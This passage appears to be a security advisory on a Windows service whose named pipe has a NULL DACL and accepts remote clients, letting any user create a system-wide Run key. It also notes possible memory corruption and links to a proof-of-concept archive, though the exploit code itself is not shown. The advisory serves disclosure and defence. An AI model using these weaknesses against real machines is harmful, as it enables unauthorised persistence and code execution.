If the passed string is not NUL terminated then this code will cause temporary memory corruption. For example if the passed string is exactly the same size as the prefix then the code will write the 0 one character off the end of the allocated buffer. Also if the read strings size is less than the length of the prefix but the original allocation has non NUL data the zero could be written into another valid block. As the function restores the original value its unlikely to be reliably exploitable. However theres actually no reason to do the overwrite as the code is already using strnicmp which will only check up to the prefix size.
In summary there are at least 4 issues with the service:
1) Service exposes the ability to create an arbitrary system wide run key entry
2) When creating the named pipe the PIPE_REJECT_REMOTE_CLIENTS is not passed meaning it can be connected to remotely to exploit the vulnerability.
3) The pipe has a NULL DACL which allows any user to connect to it
4) The processing of the registry key path has potential for memory corruption.
Proof of Concept:
Ive provided a proof of concept, in C# which will need to be compiled. You can use the csc compiler which comes with the .NET framework.
Expected Result:
The pipe service can't be connected to or it doesn't write the registry key.
Observed Result:
A new run key is present in HKLM\Software\Microsoft\Windows\CurrentVersion\Run which executes notepad (note on 64bit systems it will actually be under the Wow6432Node as the service is 32bit, but it will still execute).
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38792.zip